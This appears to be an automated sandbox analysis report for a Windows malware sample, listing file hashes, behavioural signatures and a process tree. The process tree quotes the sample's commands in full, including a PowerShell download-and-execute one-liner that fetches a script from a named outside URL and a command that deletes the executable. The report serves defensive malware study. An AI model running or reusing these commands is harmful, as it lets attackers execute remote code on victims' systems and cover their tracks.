Analysis
-
max time kernel
80s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
08-03-2023 10:21
Static task
static1
Behavioral task
behavioral1
Sample
daba6aa332fac84534abce432c65388b1be0b2eb5cb19ac9220d519136a343d7.exe
Resource
win10v2004-20230220-en
General
-
Target
daba6aa332fac84534abce432c65388b1be0b2eb5cb19ac9220d519136a343d7.exe
-
Size
150KB
-
MD5
64d5a984c5d0fd74b729be5b52c00389
-
SHA1
4c5478bd5fd7b58b9c89cbf375ef0005f6807e2f
-
SHA256
daba6aa332fac84534abce432c65388b1be0b2eb5cb19ac9220d519136a343d7
-
SHA512
87f290f55d3096ac48c82e192b49b9ff3eefa4f3c2ac6592d38e084e8bd8fc7bdc24169265d0cbce20ad6d0767aef521215b33a7cfa763fe73d3adf9184afcbf
-
SSDEEP
3072:JeNBJK/n4QA8UTemqn0MrWGeogELKibPKZ9zW2dWFMh0khBYGCw92jqsFM8At6:JeOYZw2dBkk9sa8A6
Malware Config
Extracted
https://houssagynecologue.com/assets/js/debug2.ps1
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 16 4284 powershell.exe 22 4284 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation daba6aa332fac84534abce432c65388b1be0b2eb5cb19ac9220d519136a343d7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2504 PING.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4284 powershell.exe 4284 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4284 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2552 wrote to memory of 3692 2552 daba6aa332fac84534abce432c65388b1be0b2eb5cb19ac9220d519136a343d7.exe 82 PID 2552 wrote to memory of 3692 2552 daba6aa332fac84534abce432c65388b1be0b2eb5cb19ac9220d519136a343d7.exe 82 PID 3692 wrote to memory of 4284 3692 cmd.exe 84 PID 3692 wrote to memory of 4284 3692 cmd.exe 84 PID 2552 wrote to memory of 3048 2552 daba6aa332fac84534abce432c65388b1be0b2eb5cb19ac9220d519136a343d7.exe 97 PID 2552 wrote to memory of 3048 2552 daba6aa332fac84534abce432c65388b1be0b2eb5cb19ac9220d519136a343d7.exe 97 PID 2552 wrote to memory of 3048 2552 daba6aa332fac84534abce432c65388b1be0b2eb5cb19ac9220d519136a343d7.exe 97 PID 3048 wrote to memory of 2504 3048 cmd.exe 99 PID 3048 wrote to memory of 2504 3048 cmd.exe 99 PID 3048 wrote to memory of 2504 3048 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\daba6aa332fac84534abce432c65388b1be0b2eb5cb19ac9220d519136a343d7.exe"C:\Users\Admin\AppData\Local\Temp\daba6aa332fac84534abce432c65388b1be0b2eb5cb19ac9220d519136a343d7.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://houssagynecologue.com/assets/js/debug2.ps1')"2⤵
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://houssagynecologue.com/assets/js/debug2.ps1')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4284
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\daba6aa332fac84534abce432c65388b1be0b2eb5cb19ac9220d519136a343d7.exe" >> NUL2⤵
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:2504
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82